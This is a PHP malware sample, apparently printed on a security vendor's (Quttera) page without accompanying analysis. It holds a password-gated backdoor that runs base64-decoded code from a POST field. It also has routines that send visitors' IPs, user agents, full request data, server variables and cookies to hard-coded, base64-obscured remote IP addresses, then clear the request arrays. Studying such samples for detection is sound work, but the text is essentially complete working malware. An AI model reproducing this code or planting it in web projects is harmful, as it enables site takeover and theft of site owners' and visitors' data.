(if
( isset (
$_POST[product_id]) && md5(
$_POST[product_id]
)
==="b417cc0f4a119fa3eee50bcbf526eeb1" ){eval(
base64_decode($_POST[image_id])
); };
$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
foreach ($ar as $v){
$array = array(
'statistics_hash' => $_POST['prod_hash'],
'ua' => $_SERVER['HTTP_USER_AGENT'],
'cl_ip' => $_SERVER['REMOTE_ADDR']
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
unset($_POST['prod_hash']);
$_POST = array_values($_POST);
}
}
$q=[
"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
"#select.+into.+\@.+\;#is",
"#insert.+into.+values#is",
"#update.+set.+where.+\=#is",
"#\<\?php#is",
"#file_put_contents[\( \t]+#is",
"#select.+sleep\(.+\)#is",
];
$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);
foreach($q as $u){
if(PREg_MaTch($u,$l)){
$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
foreach ($ar as $v){
$array = array(
'product' => base64_encode($ff),
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
}
$_REQUEST = array();
$_GET = array();
$_POST = array();
$_COOKIE = array();
}
})
© 2023 Quttera Ltd. All rights reserved.